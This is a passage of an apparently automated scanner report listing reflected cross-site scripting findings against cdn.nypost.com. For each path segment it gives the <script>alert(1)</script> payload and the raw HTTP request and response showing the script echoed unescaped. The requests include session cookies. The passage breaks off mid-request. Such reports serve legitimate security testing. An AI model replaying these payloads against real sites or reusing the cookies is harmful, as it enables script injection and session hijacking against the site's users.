Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:25 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig48f7f<script>alert(1)</script>d51368caf7e/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js</p>
...[SNIP]...

1.8. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c5909<script>alert(1)</script>b5c937fb111 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortalc5909<script>alert(1)</script>b5c937fb111/nypost/blocks/breaking_news_bar/breaking_news_bar.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:34 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortalc5909<script>alert(1)</script>b5c937fb111/nypost/blocks/breaking_news_bar/breaking_news_bar.js</p>
...[SNIP]...

1.9. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d53c7<script>alert(1)</script>409a8d178c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostd53c7<script>alert(1)</script>409a8d178c7/blocks/breaking_news_bar/breaking_news_bar.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:42 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostd53c7<script>alert(1)</script>409a8d178c7/blocks/breaking_news_bar/breaking_news_bar.js</p>
...[SNIP]...

1.10. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c6a5a<script>alert(1)</script>72e7deb3ac2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksc6a5a<script>alert(1)</script>72e7deb3ac2/breaking_news_bar/breaking_news_bar.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:50 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksc6a5a<script>alert(1)</script>72e7deb3ac2/breaking_news_bar/breaking_news_bar.js</p>
...[SNIP]...

1.11. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d8841<script>alert(1)</script>053895585d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bard8841<script>alert(1)</script>053895585d6/breaking_news_bar.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bard8841<script>alert(1)</script>053895585d6/breaking_news_bar.js</p>
...[SNIP]...

1.12. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 169b1<script>alert(1)</script>941eb6b7e24 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js169b1<script>alert(1)</script>941eb6b7e24 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js169b1<script>alert(1)</script>941eb6b7e24</p>
...[SNIP]...

1.13. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a1f49<script>alert(1)</script>2a819db42b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfiga1f49<script>alert(1)</script>2a819db42b6/WebPortal/nypost/blocks/fat_header/fat_header.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfiga1f49<script>alert(1)</script>2a819db42b6/WebPortal/nypost/blocks/fat_header/fat_header.js</p>
...[SNIP]...

1.14. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 78a84<script>alert(1)</script>18472414dba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal78a84<script>alert(1)</script>18472414dba/nypost/blocks/fat_header/fat_header.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal78a84<script>alert(1)</script>18472414dba/nypost/blocks/fat_header/fat_header.js</p>
...[SNIP]...

1.15. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61410<script>alert(1)</script>71367fd88fd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost61410<script>alert(1)</script>71367fd88fd/blocks/fat_header/fat_header.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost61410<script>alert(1)</script>71367fd88fd/blocks/fat_header/fat_header.js</p>
...[SNIP]...

1.16. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 454bd<script>alert(1)</script>7d206912668 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks454bd<script>alert(1)</script>7d206912668/fat_header/fat_header.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:36 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks454bd<script>alert(1)</script>7d206912668/fat_header/fat_header.js</p>
...[SNIP]...

1.17. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3df28<script>alert(1)</script>d1a0fb4b8b2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/fat_header3df28<script>alert(1)</script>d1a0fb4b8b2/fat_header.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/fat_header3df28<script>alert(1)</script>d1a0fb4b8b2/fat_header.js</p>
...[SNIP]...

1.18. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4c1e3<script>alert(1)</script>e90b2074792 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js4c1e3<script>alert(1)</script>e90b2074792 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:51 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js4c1e3<script>alert(1)</script>e90b2074792</p>
...[SNIP]...

1.19. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b074<script>alert(1)</script>b2160c254f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig1b074<script>alert(1)</script>b2160c254f9/WebPortal/nypost/blocks/most_popular/most_popular_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:48 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig1b074<script>alert(1)</script>b2160c254f9/WebPortal/nypost/blocks/most_popular/most_popular_functions.js</p>
...[SNIP]...

1.20. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ce2a6<script>alert(1)</script>786c1e2c906 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortalce2a6<script>alert(1)</script>786c1e2c906/nypost/blocks/most_popular/most_popular_functions.js HTTP/1.1
Host: cdn.nypost.com
